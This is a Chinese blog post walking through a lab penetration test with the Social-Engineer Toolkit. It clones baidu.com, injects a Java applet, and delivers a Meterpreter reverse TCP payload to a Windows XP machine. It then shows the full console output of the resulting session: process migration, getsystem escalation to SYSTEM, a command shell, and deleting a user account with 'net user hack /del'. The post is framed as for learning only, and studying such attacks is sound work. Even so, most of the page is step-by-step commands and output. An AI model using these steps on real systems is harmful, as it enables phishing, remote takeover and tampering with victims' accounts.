制作钓鱼网站进行渗透测试——内网SET工具包

set工具包中的web攻击向量,可以克隆出与实际的可信站点看起来一模一样的网页,这使得受害者认为他们正在浏览一个合法的站点。


本例子使用Java Applet攻击向量对用户进行欺骗
以下是具体步骤

setoolkit进入set工具包


          _______________________________
         /   _____/\_   _____/\__    ___/
         \_____  \  |    __)_   |    |
         /        \ |        \  |    |
        /_______  //_______  /  |____|
                \/         \/            

[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
                      Version: 8.0.3
                    Codename: 'Maverick'
[---]        Follow us on Twitter: @TrustedSec         [---]
[---]        Follow me on Twitter: @HackingDave        [---]
[---]       Homepage: https://www.trustedsec.com       [---]
        Welcome to the Social-Engineer Toolkit (SET).
         The one stop shop for all of your SE needs.

   The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

   It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!


urllib.error.URLError: <urlopen error [Errno 111] Connection refused>
 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) Third Party Modules

  99) Return back to the main menu.

set> 2
....
The HTA Attack method will allow you to clone a site and perform powershell injection through HTA files which can be used for Windows-based powershell exploitation through the browser.

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) HTA Attack Method

  99) Return to Main Menu

set:webattack>1
...
 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.
   
   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>2
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: no
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.1.113]:  

[-------------------------------------------]
Java Applet Configuration Options Below
[-------------------------------------------]
Next we need to specify whether you will use your own self generated java applet, built in applet, or your own code signed java applet. In this section, you have all three options available. The first will create a self-signed certificate if you have the java jdk installed. The second option will use the one built into SET, and the third will allow you to import your own java applet OR code sign the one built into SET if you have a certificate.
Select which option you want:
1. Make my own self-signed certificate applet.
2. Use the applet built into SET.
3. I have my own code signing certificate or applet.

Enter the number you want to use [1-3]: 2
[*] Okay! Using the one built into SET - be careful, self signed isn't accepted in newer versions of Java :(
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.baidu.com

[*] Cloning the website: http://www.baidu.com                                                                                                          
[*] This could take a little bit...                                                                                                                    
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: XvOnfJKEK
[*] Malicious java applet website prepped for deployment                                                                                               
                                                                                                                                                       

What payload do you want to generate:

  Name:                                       Description:

   1) Meterpreter Memory Injection (DEFAULT)  This will drop a meterpreter payload through powershell injection
   2) Meterpreter Multi-Memory Injection      This will drop multiple Metasploit payloads via powershell injection
   3) SE Toolkit Interactive Shell            Custom interactive reverse toolkit designed for SET
   4) SE Toolkit HTTP Reverse Shell           Purely native HTTP shell with AES encryption support
   5) RATTE HTTP Tunneling Payload            Security bypass payload that will tunnel all comms over HTTP
   6) ShellCodeExec Alphanum Shellcode        This will drop a meterpreter payload through shellcodeexec
   7) Import your own executable              Specify a path for your own executable
   8) Import your own commands.txt            Specify payloads to be sent via command line

set:payloads>1
set:payloads> PORT of the listener [443]:

Select the payload you want to deliver via shellcode injection

   1) Windows Meterpreter Reverse TCP
   2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
   3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager
   4) Windows Meterpreter (ALL PORTS) Reverse TCP

set:payloads> Enter the number for the payload [meterpreter_reverse_https]:1
[*] Prepping pyInjector for delivery..
[*] Prepping website for pyInjector shellcode injection..
[*] Base64 encoding shellcode and prepping for delivery..
[*] Multi/Pyinjection was specified. Overriding config options.
[*] Generating x86-based powershell injection code...
[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...
[!] ERROR:Something is running on port 80. Attempting to see if we can stop Apache...
[!] Apache may be running, do you want SET to stop the process? [y/n]: y
[*] Attempting to stop apache.. One moment..
Stopping apache2 (via systemctl): apache2.service.
[*] Success! Apache was stopped. Moving forward within SET...

使用另一台靶机进行连接192.168.1.113:443网页,显示出百度页面,并且主机会有一个sessions出现,进入sessions即可控制靶机,具体过程如下

msf6 exploit(multi/handler) > 
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Meterpreter session 1 opened (192.168.1.113:443 -> 192.168.1.115:1133) at 2021-06-22 20:58:38 +0800


msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                  Information            Connection
  --  ----  ----                  -----------            ----------
  1         meterpreter x86/wind  WINXP-1\st21 @ WINXP-  192.168.1.113:443 ->
            ows                   1                      192.168.1.115:1133 (1
                                                         92.168.1.115)

msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > 

获取到meterpreter权限后进行跟进一步提权与其他操作(首先迁移进程,其次更换用户)

meterpreter > run post/windows/manage/migrate

[*] Running module against WINXP-1
[*] Current server process: SpVcICIXanGOf.exe (3028)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 2432
[+] Successfully migrated into process 2432
meterpreter > getpid
Current pid: 2432
meterpreter > getuid
Server username: WINXP-1\st21
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > uuid
[+] UUID: 918ed6d2b1ecf640/x86=1/windows=1/2021-06-22T12:58:36Z
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 3512 created.
Channel 2 created.
Microsoft Windows XP [�汾 5.1.2600]
(C) ��Ȩ���� 1985-2001 Microsoft Corp.

C:\Documents and Settings\st21>net user
net user

\\WINXP-1 ���û��ʻ�

-------------------------------------------------------------------------------
__wfilterd_user          Administrator            Guest                    
hack                     HelpAssistant            st21                     
SUPPORT_388945a0         
�����ɹ����ɡ�


C:\Documents and Settings\st21>net user hack /del
net user hack /del
�����ɹ����ɡ�


C:\Documents and Settings\st21>net user
net user

\\WINXP-1 ���û��ʻ�

-------------------------------------------------------------------------------
__wfilterd_user          Administrator            Guest                    
HelpAssistant            st21                     SUPPORT_388945a0         
�����ɹ����ɡ�


C:\Documents and Settings\st21>

本文简单介绍了使用set工具包的web攻击向量伪造网页进行欺骗渗透测试,仅供学习

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我重来不说话

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值